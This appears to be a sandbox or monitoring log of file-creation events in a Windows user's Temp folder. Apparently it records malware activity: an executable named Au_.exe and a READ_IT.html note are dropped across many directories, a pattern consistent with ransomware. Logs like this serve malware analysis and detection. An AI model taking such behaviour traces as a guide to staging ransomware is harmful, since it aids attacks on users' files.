Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170712115955.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160219.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160219_0_vcRuntimeMinimum_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160219_1_vcRuntimeAdditional_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160331.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160331_0_vcRuntimeMinimum_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160331_1_vcRuntimeAdditional_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160420.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160420_000_vcRuntimeMinimum_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170623160420_001_vcRuntimeAdditional_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170714083654.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170714083654_000_vcRuntimeMinimum_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170714083654_001_vcRuntimeAdditional_x86.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_x86_20170714083726.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_wcf_CA_smci_20170623_120916_381.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_wcf_CA_smci_20170623_120924_088.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_wcf_CA_smci_20170623_121050_026.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_wcf_CA_smci_20170623_121051_508.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_wcf_CA_smci_20170623_121441_919.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_wcf_CA_smci_20170623_121443_479.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\f3602e71-f411-48dc-a8b4-8e28ad592e6d.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\FXBmw2STc_LGPu1.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\FXSAPIDebugLogFile.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\goMeedoGx1tW.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ighSePHGwTinByvQOJOx.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ihFtBLLSLsDacPFyE.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\JAUReg.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\JavaDeployReg.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\java_install.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\java_install_reg.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\jawshtml.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\jmWrfy4iDuLqE.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\jusched.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\KRNpdaBZxzcXMFapMkSw.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\KVbE1A7YY.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\l3z97qs5z.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\LoAVVwL.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\LSLHuAD2luW-2NiM Pa.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_20170623_160649242-MSI_netfx_Core_x64.msi.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_20170623_160649242-MSI_netfx_Extended_x64.msi.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_20170623_160649242.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4.5 Setup_20170623_161006019-MSI_netfx_Full_x64.msi.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4.5 Setup_20170623_161006019.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4.6 Setup_20170623_161333107-MSI_netfx_Full_x64.msi.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft .NET Framework 4.6 Setup_20170623_161333107.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_20170623_160213535-MSI_vc_red.msi.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_20170623_160213535.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170623_120200287-MSI_vc_red.msi.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170623_120200287.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ose00000.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\PyrhzqI4bbIgpkw6If.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\QrlfDy64irka.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RD8CF3.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RGI2F2B.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RGI2F2B.tmp-tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RGIBC0F.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RGIBC0F.tmp-tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RGIEF52.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RGIEF52.tmp-tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SetupExe(2017062313015272C).log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SetupExe(2017072110084945C).log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SetupExe(201707211017014AC).log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SetupExe(201707261433297D4).log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SetupExe(20170726170319330).log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SetupExe(2017072617140380C).log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\sqEw.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\SzPtZIVYUvP.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\s_LcgvGEpDp21bQn.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\tbnsWPEpOzxpMIzF_w-4.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\TpuRRU4JpnGy.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\TXblOL9wEU5F81-.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\U0RRSs.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Ud8gu3P8LWWR41.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\UDDRubP6PV8.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\uFiWC2oo6CspLxPfRac.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\UKKJRF2oDniIkw0D.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\uxeventlog.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\wGagQV0Abhcdb.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\wuTxnO3y.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ZAKW6HFumIR1tN9.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\_1GzqQpQ1O7.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\{1C306CB1-771E-4B4B-A902-86E897877F5B}.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\~DFC62DB784016E8A4F.TMP	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\~nsu.tmp\Au_.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\~nsu.tmp\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\J34QD0IO\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\J34QD0IO\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\793TK2YX\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\793TK2YX\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\53XUACO8\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\53XUACO8\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\4PEP48KS\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Temporary Internet Files\Content.IE5\4PEP48KS\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\42234357-29bc-472f-be1a-21a7f646755a.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\128.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\manifest.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\uk\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\tr\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\tr\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\th\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\th\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sv\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sv\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sr\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sr\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sl\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sl\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sk\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\sk\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ru\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ru\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ro\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ro\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\pt_PT\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\pt_PT\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\pt_BR\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\pt_BR\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
